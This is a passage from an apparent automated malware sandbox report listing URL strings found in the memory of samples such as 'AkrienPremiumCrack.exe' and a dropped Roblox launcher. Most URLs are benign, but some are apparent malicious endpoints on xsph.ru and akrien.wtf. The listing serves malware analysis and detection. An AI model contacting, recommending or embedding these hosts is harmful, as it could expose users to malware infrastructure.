            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0985805.xsph.ru
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0985805.xsph.ru/
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0985805.xsph.ru/59f76ddc.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyz
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0985805.xsph.ru/59f76ddc.php?naYPdddiZRB6w7di0cADh=W0seTdtj&1rZrAbBstq1paw=7HSDZSw4HaEhh8KAz
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4189782115.0000000003292000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4188930888.0000000000492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://akrien.wtf/akrienmc/api/v2/brain.php?a=UD25iC2Q8B4thsh77058
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://bit.ly/1eMQ42U
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.000000000424B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992633051.00000000042C8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.2005445454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftBU
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.000000000424B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992633051.00000000042C8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.000000000424B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988256231.00000000042C5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
            Source: refdhcp.exe, 00000009.00000002.1917392588.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://tools.medialab.sciences-po.fr/iwanthue/index.php
            Source: RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww(w.d
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4191571770.0000000140129000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4191571770.0000000140129000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://www.roblox.comURLInfoAboutFailed
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://www.winimage.com/zLibDll
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: http://www.winimage.com/zLibDll-1.2.11rbr
            Source: RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://127.0
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://127.0.0.1
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://127.0.0.16)
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://127.0.0.1WindowsBootstrapperRecoveryInstallerUrlWindowsBootstrapperAlternativeAdminKeyDeploy
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://127.0.0.1tleThreshold
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4189782115.0000000003292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://akrien.wtf/
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4189782115.0000000003292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://akrien.wtf/&
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4188930888.0000000000492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://akrien.wtf/akrienmc/api/v2/brain.php?a=UD25iC2Q8B4thsh77058
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.00000000041F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.com/
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.com/7K
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.00000000041F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-telemetry.roblox.com/P
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/)
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/W
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerr
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper/bucket/zflag
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.2005445454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper/bucket/zflagw
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperJ
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperT
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://crashpad.chromium.org/
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://crashpad.chromium.org/bug/new
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://curl.se/docs/alt-svc.html
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://curl.se/docs/hsts.html
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://curl.se/docs/http-cookies.html
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://ecsv2.roblox.com/client/pbe
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecsv2.roblox.com/client/pbeMs2%l
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecsv2.roblox.com/client/pbeMs2?
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://ecsv2.roblox.com/client/pbeTelemetryV2UrlFFlagRolloutDuplicateRobloxTelemetryCountersEnabled
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988611713.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994811368.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005374246.00000000040B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005445454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 